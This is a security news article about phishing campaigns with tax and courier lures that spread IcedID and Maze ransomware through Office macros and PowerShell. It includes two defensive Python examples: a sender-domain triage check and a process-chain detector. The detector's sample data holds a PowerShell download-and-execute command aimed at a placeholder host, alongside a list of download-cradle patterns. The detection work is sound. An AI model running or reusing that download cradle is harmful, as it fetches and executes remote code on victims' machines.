Phishing email campaigns are recycled almost every year: the operators modify the content and upgrade the code to avoid detection. It remains one of the trickiest tactics cybercriminals use to lure potential victims into taking the bait.
The email campaign described here is reported to have hit Europe and the United States and to spread trojans onto victims' computers.
The attackers mask the content to make it look like it came from legitimate businesses and organizations.
If you are not familiar with the term phishing email, here is a short explanation. You sometimes get emails that appear to come from FedEx, UPS, your bank or your credit card company; phishing emails are made to look like one of those, but when you open a link inside the email or open an attachment, they can infect your computer with malware or steal information from you.
Discovered in 2017 by IBM X-Force Research, IcedID typically targets banks, payment card providers, and other financial institutions in an attempt to steal user credentials.
However, this new campaign does not target financial companies: the phishing email campaign discovered by Proofpoint was directed heavily at the healthcare industry.
The emails discovered use the URL uspsdelivery-service.com, while the malicious Word documents contain a purported RSA SecurID key. Opening the Word document triggers a Microsoft Office macro that launches a PowerShell script, which then downloads and installs IcedID onto the computer.
The United States is the latest target of this campaign. Earlier, the group targeted businesses in Germany with emails pretending to come from the German Federal Ministry of Finance. Besides capitalizing on the phony branding, they used .icu domains in the sender's address.
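The two sender-side tells mentioned above (a courier-branded lookalike domain such as uspsdelivery-service.com, and .icu domains in the From: address) can be turned into a simple triage rule for a mail gateway or SOC script. The following is an added example, not Proofpoint's tooling and not code from the campaign; the brand list, the TLD list and the sample From: headers (including the .icu domain) are assumptions constructed for illustration.

```python
"""Triage From: headers for the lure patterns described in the article.

Added example (not Proofpoint's tooling or the campaign's code): flags
.icu sender domains and brand-lookalike domains such as
uspsdelivery-service.com. Brand list, TLD list and sample headers are
assumptions constructed for illustration.
"""
import re
from email.utils import parseaddr

# Assumed: top-level domains seen in the sender addresses of these lures
# and rarely used by the organizations being impersonated.
SUSPICIOUS_TLDS = {"icu"}

# Assumed: brand keywords and the registrable domains each brand really uses.
BRAND_DOMAINS = {
    "usps": {"usps.com"},
    "fedex": {"fedex.com"},
    "ups": {"ups.com"},
}


def sender_domain(from_header):
    """Return the lower-cased domain of a From: header, or None if unparseable."""
    _display_name, addr = parseaddr(from_header)
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].lower()


def belongs_to(domain, legit_domains):
    """True if domain is one of legit_domains or a subdomain of one of them."""
    return any(domain == d or domain.endswith("." + d) for d in legit_domains)


def lure_indicators(from_header):
    """Return the reasons a sender looks like a phishing lure ([] if none)."""
    domain = sender_domain(from_header)
    if domain is None:
        return ["unparseable sender address"]
    reasons = []
    tld = domain.rsplit(".", 1)[-1]
    if tld in SUSPICIOUS_TLDS:
        reasons.append(f"sender TLD .{tld} is abused by these campaigns")
    for brand, legit in BRAND_DOMAINS.items():
        # Brand keyword at the start of a label (e.g. "uspsdelivery-service.com")
        # while the domain is not one the brand actually owns.
        if re.search(rf"(^|[.-]){brand}", domain) and not belongs_to(domain, legit):
            reasons.append(f"'{brand}' branding on unrelated domain {domain}")
    return reasons


# Constructed sample From: headers; the .icu domain is invented for illustration.
SAMPLE_FROM_HEADERS = [
    '"USPS Delivery" <notice@uspsdelivery-service.com>',
    '"Finanzministerium" <steuer@finanzministerium-erstattung.icu>',
    '"UPS Tracking" <noreply@ups.com>',
    "colleague@example.org",
]


def triage(headers=SAMPLE_FROM_HEADERS):
    """Map each header to its indicator list; an empty list means nothing flagged."""
    return {h: lure_indicators(h) for h in headers}


if __name__ == "__main__":
    for header, reasons in triage().items():
        print("FLAG " if reasons else "ok   ", header, *reasons, sep=" | ")
```

The brand check deliberately keys on the keyword starting a label (preceded by the start of the domain, a dot or a hyphen) so that "ups" does not fire on every domain containing "groups"; the trade-off is that a lookalike such as "my-usps-notice.example" is caught while "trackusps.example" is not, so the keyword list and regex should be tuned against your own mail flow.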
The interesting part of this campaign is that the attackers used Cobalt Strike, a commercially available penetration testing tool, to deploy the malware.
Sent primarily to German IT services companies, the fraudulent email promises a 2019 tax refund, asking the recipient to open an attached Word document to submit a claim for the refund. Instead, opening the document launches an Office macro that executes a PowerShell script, which then downloads and installs Maze ransomware.
A similar campaign targeted Italy last October. It used branding from the Italian Ministry of Taxation, again with .icu domains in the sender's address like the other campaigns. As with the email campaign targeting US companies, the lures allegedly included RSA SecurID keys to make them look legitimate.
The email tells the recipient to open and read the attached document to avoid a tax assessment and penalties. In reality, opening it triggers macros that run PowerShell scripts to download payloads and install Maze ransomware.
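The infection chain described for both the IcedID and the Maze lures is the same: a Word or Excel document runs a macro, the macro starts PowerShell, and PowerShell fetches the payload. On an endpoint with process-creation logging (Sysmon Event ID 1 or equivalent) that chain is visible as an Office binary being the parent of a script host. The following is an added example of a detection rule over such events, not Proofpoint's detection content and not the campaign's code; the sample events, the command lines and the marker lists are assumptions constructed for illustration, and placeholder.invalid is a reserved non-resolving name.

```python
"""Detect the document -> macro -> PowerShell -> download chain.

Added example (not Proofpoint's detection content): a small rule over
process-creation events shaped like Sysmon Event ID 1 fields. Events,
command lines and marker lists are constructed assumptions.
"""

# Assumed: Office binaries a macro would be executing inside.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Assumed: script hosts a macro commonly launches to fetch a second stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Assumed: substrings suggesting a download cradle or an encoded command.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "-encodedcommand", " -enc ")


def image_name(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return an alert dict for an Office -> script host launch, else None."""
    parent = image_name(event["ParentImage"])
    child = image_name(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "").lower()
    markers = [m for m in DOWNLOAD_MARKERS if m in cmd]
    return {
        # Any script host under Office is worth a look; a download cradle
        # on the command line matches the chain the article describes.
        "severity": "high" if markers else "medium",
        "parent": parent,
        "child": child,
        "markers": markers,
        "user": event.get("User", "?"),
    }


def detect(events):
    """Run classify() over a sequence of events and keep the alerts."""
    return [alert for alert in map(classify, events) if alert is not None]


# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -NoProfile -WindowStyle Hidden -Command "
                     "\"IEX (New-Object Net.WebClient).DownloadString("
                     "'http://placeholder.invalid/stage')\""),
     "User": "CORP\\jdoe"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",          # printing helper: benign child
     "CommandLine": "splwow64.exe 12288",
     "User": "CORP\\jdoe"},
    {"ParentImage": r"C:\Windows\explorer.exe",    # PowerShell, but not from Office
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1",
     "User": "CORP\\admin"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",      # shell from Office, no download
     "CommandLine": "cmd.exe /c dir",
     "User": "CORP\\mlee"},
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['parent']} -> {alert['child']} "
              f"as {alert['user']} markers={alert['markers']}")
```

The parent/child pairing is what makes this rule robust: the command-line markers only raise severity, so an attacker changing the download cradle still produces a medium alert, while a legitimate administrator running PowerShell from Explorer produces none.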
Most of the time they use finance-related lures, which are seasonal in nature: they send more tax-related phishing emails around the annual tax filing deadlines. This pattern applies to whichever country they target.
Back in 2017 they even used social engineering to help deliver banking Trojans and spread ransomware. As recently as 2018, researchers from Proofpoint discovered phishing campaigns in the US with tax-related lures and IRS branding.
It is a never-ending cat-and-mouse chase to find and neutralize malware. Millions of malware samples are sorted through every day, and it takes time to identify and analyze the latest campaigns. According to Proofpoint's analysis, the campaign's actions did not overlap with those of known threat actors, which indicates that a new group is behind the attacks. Some evidence uncovered indicated that the actor is Russian-speaking.
“Although these campaigns are small in volume, currently, they are significant for their abuse of trusted brands, including government agencies, and for their relatively rapid expansion across multiple geographies,” Christopher Dawson, Threat Intelligence Lead for Proofpoint, said.
From what they have gathered, this group has targeted organizations in Germany, Italy and the United States. The lures are hand-crafted to suit the country being targeted, and even use the correct language for the intended recipients.
Unsolicited emails should be treated with caution. Be extra careful opening attachments, and the same principle applies to opening or clicking links and entering credentials. If you get an email about your accounts, banking, finances, taxes, or shipping/courier services, double-check that it is a legitimate email you are expecting.